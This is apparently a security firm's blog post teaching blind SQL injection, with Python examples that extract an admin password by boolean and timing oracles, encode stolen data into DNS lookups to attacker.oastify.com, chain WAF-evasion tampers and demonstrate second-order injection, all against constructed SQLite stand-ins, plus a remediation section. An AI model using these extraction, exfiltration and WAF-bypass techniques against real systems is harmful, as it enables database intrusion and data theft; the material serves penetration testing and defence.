BIPI

Blind SQL Injection Techniques: Time-Based, Boolean, and Out-of-Band Exfiltration

Cybersecurity

Practical blind SQLi tradecraft for 2024: boolean oracles, time delays that survive jittery networks, and DNS exfiltration when nothing else echoes.

By Arjun Raghavan, Security & Systems Lead, BIPI · November 15, 2024 · 11 min read

#sql-injection #pentesting #sqlmap #database-security

When the application swallows errors and returns identical responses for true and false, classic in-band SQLi falls apart. Blind injection is where the craft lives: building a reliable oracle, then exfiltrating bytes one at a time through inference or out-of-band channels.

Spotting Blind Injection Points

  • Login forms returning generic invalid credentials regardless of input shape
  • Search endpoints with consistent 200 OK but subtle latency variance
  • JSON APIs that hide stack traces behind a generic 500
  • ORDER BY parameters where numeric values quietly accept expressions
  • Headers like User-Agent and Referer logged into SQL without parameterization

Boolean-Based Oracles

Build a stable diff. Send 1 AND 1=1 and 1 AND 1=2, then compare status, response length, and a hash of the body with volatile parts (CSRF tokens, timestamps, request IDs) stripped. Calibrate until the two fingerprints differ reliably; a flaky oracle silently corrupts every byte you extract. Once you have a binary oracle, pull data one character at a time with SUBSTRING and ASCII comparisons, binary-searching the byte range (about seven probes per character) rather than testing candidates one by one.

Time-Based Techniques

When responses are identical, lean on the clock. MySQL SLEEP(), PostgreSQL pg_sleep(), MSSQL WAITFOR DELAY, and Oracle DBMS_PIPE.RECEIVE_MESSAGE all work. Measure baseline latency first and pick a delay several times larger than the worst jitter you see; then run each probe three times and use the median, so one slow response cannot flip a bit.
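The following is an added example, not code from the post or from BIPI, covering both of the preceding sections: a boolean oracle calibrated on a known-true/known-false pair, a time-based oracle that takes the median of three probes, and one binary-search extractor that works with either. The target is a constructed in-memory SQLite database standing in for the application (the table names, the admin password, and the product page are all invented here); the time-based endpoint is simulated with time.sleep() plus seeded jitter because SQLite has no SLEEP(). The probe expressions use SQLite spelling (unicode(substr(...))); the comments give the MySQL equivalents.

```python
import hashlib
import random
import sqlite3
import statistics
import time

# Constructed stand-in for the target application's database (not a real site).
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE products (id INTEGER, name TEXT)")
DB.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
DB.executemany("INSERT INTO products VALUES (?, ?)", [(1, "Widget"), (2, "Gadget")])
DB.execute("INSERT INTO users VALUES (1, 'admin', 'Pa55w0rd!')")

ADMIN_PW = "(SELECT password FROM users WHERE username = 'admin')"


def vulnerable_product_page(pid: str) -> str:
    """The bug: pid is concatenated into the query. Errors are swallowed and
    both outcomes render a 200 page, so only the body differs."""
    try:
        row = DB.execute("SELECT name FROM products WHERE id = " + pid).fetchone()
    except sqlite3.Error:
        row = None
    return "<h1>Product</h1><p>%s</p>" % (row[0] if row else "Not available")


def fingerprint(body: str) -> str:
    # Strip volatile parts (CSRF tokens, timestamps) before hashing on a real
    # target; the stand-in has none, so this is length plus a body hash.
    return "%d:%s" % (len(body), hashlib.sha256(body.encode()).hexdigest())


def build_boolean_oracle():
    """Calibrate on known-true and known-false probes; refuse to run without a
    stable diff, since a flaky oracle silently corrupts every extracted byte."""
    true_fp = fingerprint(vulnerable_product_page("1 AND 1=1"))
    false_fp = fingerprint(vulnerable_product_page("1 AND 1=2"))
    if true_fp == false_fp:
        raise RuntimeError("no stable diff between true and false responses")

    def oracle(condition: str) -> bool:
        fp = fingerprint(vulnerable_product_page("1 AND (" + condition + ")"))
        if fp not in (true_fp, false_fp):
            raise RuntimeError("unexpected response; recalibrate the oracle")
        return fp == true_fp
    return oracle


JITTER = random.Random(7)  # seeded so the simulated network is repeatable


def slow_endpoint(condition: str, delay: float) -> float:
    """Simulated time-based probe: the DB 'sleeps' when the condition is true
    (SLEEP() / pg_sleep() / WAITFOR DELAY on a real target) and the network
    adds jitter either way. Returns the observed round-trip time in seconds."""
    cond_true = DB.execute("SELECT " + condition).fetchone()[0] == 1
    start = time.monotonic()
    time.sleep((delay if cond_true else 0.0) + JITTER.uniform(0.0, delay / 4))
    return time.monotonic() - start


def is_delayed(samples, delay: float) -> bool:
    """Median of repeated probes: a single jitter spike cannot flip the bit."""
    return statistics.median(samples) >= delay / 2


def build_time_oracle(delay: float = 0.1, probes: int = 3):
    # 0.1 s keeps the simulation quick; over a real WAN use seconds (the post's 8 s).
    def oracle(condition: str) -> bool:
        return is_delayed([slow_endpoint(condition, delay) for _ in range(probes)], delay)
    return oracle


def binary_search(oracle, expr: str, low: int, high: int) -> int:
    """Recover the integer value of SQL expression `expr`, known to lie in
    [low, high], with ceil(log2(high - low + 1)) yes/no questions."""
    while low < high:
        mid = (low + high) // 2
        if oracle(expr + " > " + str(mid)):
            low = mid + 1
        else:
            high = mid
    return low


def extract_admin_password(oracle) -> str:
    """Length first, then one character per ~7 probes over printable ASCII.
    SQLite spelling; MySQL would be ASCII(SUBSTRING(x, pos, 1)) and LENGTH(x)."""
    length = binary_search(oracle, "length(" + ADMIN_PW + ")", 0, 64)
    return "".join(
        chr(binary_search(oracle, "unicode(substr(%s, %d, 1))" % (ADMIN_PW, pos), 32, 126))
        for pos in range(1, length + 1)
    )


if __name__ == "__main__":
    print("boolean oracle:", extract_admin_password(build_boolean_oracle()))
    print("time oracle, password length:",
          binary_search(build_time_oracle(), "length(" + ADMIN_PW + ")", 0, 64))
```

The two oracles are interchangeable from the extractor's point of view, which is the reason to write the extraction as a binary search over an abstract yes/no function: when a target gives you a body diff you get the fast path, and when it does not you swap in the timing oracle and pay three probes per question instead of one.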

Out-of-Band Exfiltration

  1. MSSQL xp_dirtree pointed at a Burp Collaborator UNC host
  2. Oracle UTL_HTTP.REQUEST with attacker URL embedding the secret as a subdomain
  3. MySQL LOAD_FILE on Windows pointing to a UNC path you control
  4. PostgreSQL COPY TO PROGRAM where superuser is available
  5. DNS exfiltration by concatenating the secret into a subdomain of attacker.oastify.com
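The database-side trigger differs per engine (the list above); what stays the same is the wire format of the DNS channel, and that is where most failed exfiltration attempts go wrong. Below is an added example, not code from the post or from BIPI, of the encoding rules a practitioner has to respect (hex rather than base64 because DNS folds case and rejects + and /, at most 63 characters per label, at most 253 for the whole name) plus the receiver that reassembles out-of-order, duplicated and case-mangled lookups from an interaction log. The attacker.oastify.com domain is the post's; the session/sequence label layout and the sample log lines are constructed for this example.

```python
import re
from collections import defaultdict

MAX_LABEL = 63   # RFC 1035: one label
MAX_NAME = 253   # RFC 1035: whole name in text form, dots included


def encode_for_dns(secret: bytes, session: str, domain: str, labels_per_name: int = 3):
    """Names the database should resolve so that `secret` reaches our resolver.
    Each name carries up to labels_per_name data labels of 63 hex chars, then a
    sequence label (s0, s1, ...) and a session label so the receiver can put
    the chunks back in order even when lookups arrive out of order."""
    hexed = secret.hex()
    per_name = MAX_LABEL * labels_per_name
    names = []
    for seq, start in enumerate(range(0, len(hexed), per_name)):
        chunk = hexed[start:start + per_name]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join(labels + ["s%d" % seq, session, domain])
        if len(name) > MAX_NAME:
            raise ValueError("name too long; lower labels_per_name")
        names.append(name)
    return names


def decode_dns_log(log_lines, domain: str):
    """Reassemble secrets from an interaction log. Tolerates duplicate lookups
    (resolver retries), 0x20 case randomisation and out-of-order arrival;
    a session with a missing chunk decodes to None so you know to re-trigger."""
    pattern = re.compile(r"([0-9a-f.]+)\.s(\d+)\.([a-z0-9]+)\." + re.escape(domain.lower()))
    parts = defaultdict(dict)
    for line in log_lines:
        m = pattern.search(line.lower())
        if m:
            data, seq, session = m.groups()
            parts[session][int(seq)] = data.replace(".", "")
    result = {}
    for session, chunks in parts.items():
        if set(chunks) != set(range(max(chunks) + 1)):
            result[session] = None          # gap in the sequence: a lookup was lost
            continue
        result[session] = bytes.fromhex("".join(chunks[i] for i in range(len(chunks))))
    return result


# Constructed interaction log in the shape of a Collaborator/interact.sh export:
# chunk s1 arrives before s0, s0 is retried with randomised case, and the second
# session (d9a1) never delivers its first chunk.
SAMPLE_LOG = [
    "2024-11-15T10:22:01Z A 30726421.s1.k7f2.attacker.oastify.com from 203.0.113.9",
    "2024-11-15T10:22:01Z A 5061353577.S0.K7F2.ATTACKER.OASTIFY.COM from 203.0.113.9",
    "2024-11-15T10:22:02Z A 5061353577.s0.k7f2.attacker.oastify.com from 203.0.113.9",
    "2024-11-15T10:22:05Z A 41424344.s1.d9a1.attacker.oastify.com from 203.0.113.9",
]

if __name__ == "__main__":
    for name in encode_for_dns(b"Pa55w0rd!", "k7f2", "attacker.oastify.com"):
        print(name)
    print(decode_dns_log(SAMPLE_LOG, "attacker.oastify.com"))
```

On the database side the hex conversion is the engine's own function (HEX() in MySQL, RAWTOHEX in Oracle, encode(..., 'hex') in PostgreSQL, fn_varbintohexstr in MSSQL) and the chunking has to be done with SUBSTRING in the same query; the receiver above does not care which engine produced the lookups, only that each label is hex and that the sequence and session labels are present.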

WAF Bypass Tricks

  • Comments as whitespace (SELECT/**/1) and MySQL versioned comments (/*!50000SELECT*/), which MySQL executes as SQL and other engines ignore
  • Case mixing and whitespace alternatives like tab, newline, form feed
  • Moving the payload into a content type or nested JSON field the WAF does not parse but the application does
  • HTTP parameter pollution where the WAF reads one and the app concatenates both
  • Unicode lookalikes for keywords where the application or driver normalizes the text (NFKC, best-fit mapping) after the WAF has inspected the raw bytes

Tooling: sqlmap and Beyond

sqlmap is excellent at automating boolean and time-based extraction. Use --technique=BT with --time-sec=8 and a tamper chain such as --tamper=between,space2comment,charunicodeencode (charunicodeencode only helps where the stack decodes %uXXXX sequences, typically classic ASP on IIS). For OOB, pair with Burp Collaborator or interact.sh.
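To make the bypass list and the tamper chain concrete, here is an added example, not code from the post, from BIPI or from sqlmap, that reimplements three of the transforms in the spirit of sqlmap's between, space2comment and charunicodeencode tampers, runs a payload through a constructed signature rule standing in for a naive WAF, and then checks against a real parser (SQLite) that the tampered payload still evaluates to the same thing as the original. The rule, the regexes and the simplifications (only simple operands on either side of = and >) are this example's own.

```python
import random
import re
import sqlite3


def space2comment(payload: str) -> str:
    """Replace spaces with an inline comment; the SQL parser treats it as whitespace."""
    return payload.replace(" ", "/**/")


def between(payload: str) -> str:
    """Rewrite 'a > b' as 'a NOT BETWEEN 0 AND b' and 'a = b' as 'a BETWEEN b AND b'
    (sqlmap's between tamper does the same); many signatures key on the
    comparison operator rather than on the keywords. Simple operands only."""
    payload = re.sub(r"(\S+)\s*>\s*(\w+)", r"\1 NOT BETWEEN 0 AND \2", payload)
    return re.sub(r"(\S+)\s*=\s*(\w+)", r"\1 BETWEEN \2 AND \2", payload)


def randomcase(payload: str, rng: random.Random = random.Random(1)) -> str:
    """Mix letter case: SQL keywords are case-insensitive, naive patterns often are not."""
    return "".join((c.upper() if rng.random() < 0.5 else c.lower()) if c.isalpha() else c
                   for c in payload)


def charunicodeencode(payload: str) -> str:
    """sqlmap-style %uXXXX encoding; only useful where the stack (classic ASP /
    some IIS setups) decodes %u sequences after the WAF has looked."""
    return "".join("%%u%04X" % ord(c) for c in payload)


def tamper_chain(payload: str, *tampers):
    """Apply tampers left to right, the way sqlmap applies --tamper=a,b,c."""
    for tamper in tampers:
        payload = tamper(payload)
    return payload


# Constructed stand-in for a signature rule: boolean operator, operand, comparison.
NAIVE_RULE = re.compile(r"\b(AND|OR)\s+\S+\s*[=<>]", re.IGNORECASE)


def naive_waf_blocks(payload: str) -> bool:
    return NAIVE_RULE.search(payload) is not None


def evaluates_same(original: str, tampered: str) -> bool:
    """Ask a real parser whether the tampered form still means the same thing.
    A bypass that the database no longer understands is not a bypass."""
    conn = sqlite3.connect(":memory:")
    return (conn.execute("SELECT (" + original + ")").fetchone()
            == conn.execute("SELECT (" + tampered + ")").fetchone())


if __name__ == "__main__":
    probe = "1 AND 1=1"
    for stage in (between, randomcase, space2comment):
        probe = stage(probe)
        print("%-14s blocked=%-5s same=%s  %s" % (
            stage.__name__, naive_waf_blocks(probe), evaluates_same("1 AND 1=1", probe), probe))
    print(charunicodeencode("1 AND 1=1"))
```

The evaluates_same check is the part worth keeping in your own tooling: every tamper you add is a chance to break the query on the target's dialect, and finding that out from an oracle that has quietly gone all-false is far more expensive than one round-trip to a local parser.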

Manual injection teaches the database. Automation only speeds up what you already understand.

Second-Order Injection

The payload is stored safely on registration and fires later, when an admin-side query concatenates the stored value instead of binding it. Audit profile updates, support tickets, and audit log viewers. The detection oracle lives in a different request than the injection point, often under a different user, so tooling that tests one request at a time misses it.
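An added example, not code from the post or from BIPI, of the shape just described: the registration handler is correctly parameterized, so a scanner pointed at it sees nothing, and the admin view that runs days later is the one that concatenates. The schema, the ticket data and the handler names are constructed for this example; the database is an in-memory SQLite stand-in.

```python
import sqlite3

# Constructed stand-in for the application's database.
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT);
CREATE TABLE tickets (id INTEGER PRIMARY KEY, owner TEXT, body TEXT, private INTEGER);
INSERT INTO tickets VALUES (1, 'alice', 'card ending 4242 declined', 1);
INSERT INTO tickets VALUES (2, 'bob', 'how do I reset 2FA?', 0);
""")


def register(username: str) -> int:
    """First request: properly parameterized. The payload is stored verbatim,
    which is exactly what a parameterized query is supposed to do."""
    cur = DB.execute("INSERT INTO users (username, role) VALUES (?, 'user')", (username,))
    return cur.lastrowid


def admin_tickets_for(user_id: int):
    """Second request, later and from an admin session: the stored username is
    treated as trusted and concatenated. The oracle lives here."""
    (name,) = DB.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    sql = "SELECT id, owner, body FROM tickets WHERE owner = '" + name + "' AND private = 0"
    return DB.execute(sql).fetchall()


def admin_tickets_for_fixed(user_id: int):
    """Same view with the stored value bound. Data that came out of the database
    is no more trustworthy than data that came off the wire."""
    (name,) = DB.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    return DB.execute(
        "SELECT id, owner, body FROM tickets WHERE owner = ? AND private = 0", (name,)
    ).fetchall()


if __name__ == "__main__":
    uid = register("x' OR 1=1 --")          # looks harmless at registration time
    print("vulnerable admin view:", admin_tickets_for(uid))
    print("fixed admin view:     ", admin_tickets_for_fixed(uid))
```

The payload closes the string, adds OR 1=1 and comments out the private = 0 filter, so the vulnerable view leaks every ticket including the private one. Testing this requires two sessions and two requests; a tool that only diffs the response to the request it injected into will report the registration form clean.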

Remediation That Actually Holds

  1. Parameterized queries everywhere; identifiers such as ORDER BY columns cannot be bound, so map them through an allowlist
  2. Least privilege DB accounts: no FILE, no xp_cmdshell, no superuser
  3. Egress filtering on the DB host, including DNS to anything but your own resolver, blocks DNS and HTTP exfiltration
  4. Query timeouts cap time-based exploitation
  5. WAF as defense in depth, never as the primary control
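Points 1 and 4 are the two that can be shown in code. Below is an added example, not code from the post or from BIPI, with the vulnerable search beside its hardened form (bound LIKE parameter, ORDER BY through an allowlist, sort direction as a boolean) and a per-statement execution budget, which is what caps a time-based probe at the database rather than at the WAF. The table, the rows and the allowlist are constructed for this example; the budget is implemented with SQLite's progress handler, and the equivalent knobs for server databases are named in the comments.

```python
import sqlite3
import time

# Constructed stand-in for the application's database.
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL, created_at TEXT);
INSERT INTO products VALUES (1, 'Widget', 9.5, '2024-01-03');
INSERT INTO products VALUES (2, 'Gadget', 4.0, '2024-02-11');
INSERT INTO products VALUES (3, 'Gizmo', 7.25, '2024-03-19');
""")

# The allowlist maps the sort keys a client may send to the columns they mean;
# nothing the client sends ever reaches the SQL text.
ORDER_COLUMNS = {"name": "name", "price": "price", "newest": "created_at"}


def search_vulnerable(term: str, order_by: str):
    """Before: both the search term and the ORDER BY expression are concatenated."""
    sql = ("SELECT id, name FROM products WHERE name LIKE '%" + term + "%'"
           " ORDER BY " + order_by)
    return DB.execute(sql).fetchall()


def search_hardened(term: str, order_by: str, descending: bool = False):
    """After: the term is a bound parameter; the column comes from the allowlist
    and the direction from a boolean, so neither is attacker-controlled text."""
    column = ORDER_COLUMNS.get(order_by)
    if column is None:
        raise ValueError("unsupported sort key: %r" % order_by)
    sql = ("SELECT id, name FROM products WHERE name LIKE ?"
           " ORDER BY " + column + (" DESC" if descending else " ASC"))
    return DB.execute(sql, ("%" + term + "%",)).fetchall()


def set_query_budget(conn: sqlite3.Connection, seconds: float) -> None:
    """Abort any single statement that runs longer than `seconds`. SQLite: a
    progress handler that checks a deadline reset by the trace callback at each
    statement start. Server engines have their own setting (MySQL
    max_execution_time, PostgreSQL statement_timeout, MSSQL command timeouts)."""
    state = {"deadline": float("inf")}

    def on_statement_start(_sql: str) -> None:
        state["deadline"] = time.monotonic() + seconds

    def over_budget() -> int:
        return 1 if time.monotonic() > state["deadline"] else 0   # non-zero aborts

    conn.set_trace_callback(on_statement_start)
    conn.set_progress_handler(over_budget, 1000)


def run_with_budget(sql: str, seconds: float):
    """Rows, or None when the budget cut the statement off."""
    conn = sqlite3.connect(":memory:")
    set_query_budget(conn, seconds)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


# A stand-in for an injected delay: a CPU-bound recursive CTE instead of SLEEP().
HEAVY_SQL = ("WITH RECURSIVE c(x) AS (SELECT 1 UNION ALL SELECT x + 1 FROM c"
             " WHERE x < 100000000) SELECT count(*) FROM c")

if __name__ == "__main__":
    print("leak:", search_vulnerable("' OR 1=1 --", "name"))
    print("order-by oracle:", search_vulnerable(
        "", "(CASE WHEN (SELECT count(*) FROM products) > 2 THEN price ELSE id END)"))
    print("hardened:", search_hardened("g", "price"))
    print("budget:", run_with_budget("SELECT 1", 0.1), run_with_budget(HEAVY_SQL, 0.1))
```

The ORDER BY case is the one most teams get wrong: the driver will not bind an identifier, so developers fall back to concatenation, and an ORDER BY position is a perfectly good boolean oracle (sort by one column if the condition holds, by another if not). Mapping through a dictionary closes that without any parsing of client input.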
  • 8s: recommended SLEEP duration over WAN
  • 3x: probes per bit for reliable inference
  • CVE-2024-3400: PAN-OS GlobalProtect command injection (not a SQL injection); a recent injection chain worth studying alongside the out-of-band techniques above

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.